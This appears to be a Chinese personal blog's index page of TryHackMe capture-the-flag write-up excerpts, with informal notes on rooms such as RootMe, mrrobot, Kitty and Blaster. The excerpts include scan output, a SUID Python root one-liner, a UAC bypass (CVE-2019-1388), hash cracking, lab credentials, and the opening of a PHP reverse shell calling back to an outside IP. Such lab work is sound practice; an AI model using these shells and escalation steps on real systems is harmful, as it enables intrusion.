Agent T
唉,不知道干什么 一眼dev 去看,又是8.1 rce
Insekube
又坏了,跳过了
PalsForLife
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 13:43 CSTNSE: Loaded 156 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedInitiating Ping Scan at 13:43Scanning 10.10.139.174 [2 ports]Completed Ping S ...
Anonforce
Retro
hard啊 php wordpress 404进去 C:\Users>whoami /all ERROR: Unable to get user claims information.USER INFORMATION----------------User Name SID ================= ===============================================================iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341GROUP INFORMATION-----------------Group Name Type SID Attributes ...
Blaster
CVE-2019-1388 该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中 可以理解为一个提示窗口,是有system启动的,当你控制这个提示窗口 以管理员权限打开HHUPD.EXE的时候,可以查看证书,此时的浏览器由超级管理员权限,这个时候定位到cmd.exe,打开就是system权限的cmd run persistence -X持久化
Tony the Tiger
/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码 用给的poc grep -R "THM{" * 2>/dev/null root里是这 QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y== base接一下 BC77AC072EE30E3760806864E234C7CF 不知道有什么含义吗 hashcat -a 0 -m 0 BC77AC072EE30E3760806864E234C7CF /usr/share/wordlists/rockyou.txt --force zxcvbnm123456789 …
RootMe
这个问题循序渐进的,跟着他的引导一般都能做 不看的话也是一样的思路 上来扫描,爆破目录,发现了panel然后就可以去上传文件 这里我用的是php5绕过的,绕过之后上蚁剑,反弹shell 弹回来找suid权限,找到了python python -c 'import os; os.execl("/bin/sh", "sh", "-p")' 即可root
mrrobot
我要找的就是这个呜呜呜呜 首先是目录扫描,发现到robots,license,login等有用的路由 elliot:ER28-0652账号密码登录即可 发现是个wp的网站,直接修改404页面反弹shell <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0); $VERSION = "1.0"; $ip = '165.154.5.221'; // You have changed this $port = 9999; // And this $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0 ...
Kitty
显然是个盲注 #没打完,记录一下 …什么傻鸟网络 折磨啊 !!!空格别给忘了!,你吗的 然后用binary来确定大小写 用pspy来检测定时任务 get it #!/bin/shwhile read ip;do /usr/bin/sh -c "echo $ip >> /root/logged";done < /var/www/development/logged if (preg_match( $evilword, $username )) { echo 'SQL Injection detected. This incident will be logged!'; $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; $ip .= "\n"; file_put_contents("/var/www/development ...
The Great Escape
┌──(kali㉿kali)-[~]└─$ curl -I 10.10.45.78/api/fl46HTTP/1.1 200 OKServer: nginx/1.19.6Date: Mon, 05 Feb 2024 03:53:32 GMTConnection: keep-aliveflag: THM{b801135794bf1ed3a2aafaa44c2e5ad4} kali莫名变好了点 dirb http://10.10.45.78/.well-known/ -X .txt 总之现在找到exif-util文件上传,快照,想ssrf robots里还有一个backup,先看看 <script>export default { name: 'Exif Util', auth: false, data() { return { hasResponse: false, response: '', url: '', ...
Year of the Rabbit
临期食品( 跟进看看 010都没用,得直接cat ftpuser Mou+56n%QK8sr1618B0AUshw1MA56IpIl%1s02uvTFbDzX9&Nmu?FfF~sfu^UQZmT8FF?iKO27b~V0ua4W~2-@y7dE$3j39aMQQ7xFXTWb4--CTc4ww*-u6oY9?nHv84D&0iBp4W69Gr_YfTS*%miyPsGV54C77O3FIy0c0sdO14xEhgg0Hxz15dpv#Pr$wqH7F1G8Ucoce1+gS50plnI%f0~Jw710kLoLzfhqq8u&kS9pn5yiFGj6dzeff4#!b5Ib_nrNT4E4SHDGBklKKH5zy23+S0@B3r6PHtM4NzJjEgm0!!EC1A0I2?HPHr!j00RaDEi7N+J9BYSp4uaYPYKt-ebvtmWoC3TN%cD_E6zm*seo?@c!ly3&=0ZnR8&FXz$ZPelNeE4Mu53UkKHx#86?004F9!o49dSNGY0JjA5@0EEtrm64++JZ7R6E3zJ ...
avatar
dionysus
我醉欲眠卿且去
此心安处
公告